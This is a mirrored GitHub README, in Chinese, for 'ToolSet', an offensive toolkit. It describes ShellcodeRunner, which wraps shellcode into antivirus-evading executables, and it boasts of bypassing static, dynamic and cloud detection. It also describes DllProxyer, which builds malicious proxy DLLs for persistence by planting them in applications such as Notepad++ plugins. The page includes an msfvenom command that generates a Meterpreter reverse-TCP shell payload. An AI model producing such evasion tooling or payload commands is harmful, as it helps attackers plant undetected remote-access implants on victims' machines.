Giter Club home page Giter Club logo

toolset's Introduction

ToolSet

一个小小的工具集

目前已经查杀,后续再更新

安装

curl -o docker-compose.yml https://raw.githubusercontent.com/akkuman/toolset/master/docker-compose.yml
sudo docker-compose pull && sudo docker-compose up -d

访问 http://127.0.0.1:8080/swagger/index.html 即可查看接口文档

工具列表

ShellcodeRunner

介绍

一个shellcode包装器,可根据提供的shellcode raw[msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 -f raw > ~/shell.raw]文件 生成免杀的执行器

国际惯例

ShellcodeRunner静态bypass.webp ShellcodeRunner动态bypass.webp

云查杀测试

一天过去了,还能冲,应该bypass了云查杀

一天后冲图.webp

DllProxyer

介绍

依旧是一个shellcode包装器,但是关注点不同,此工具根据用户所提供的dll和shellcode,生成一个恶意转发dll

用途和场景

一般可用在一些维权和白利用的场景上,比如目标用户使用 notepad++ 频率较高,则我们可以把 notepad++ 里面的某个插件的dll取出来做成恶意dll放入

toolset's People

Contributors

akkuman avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.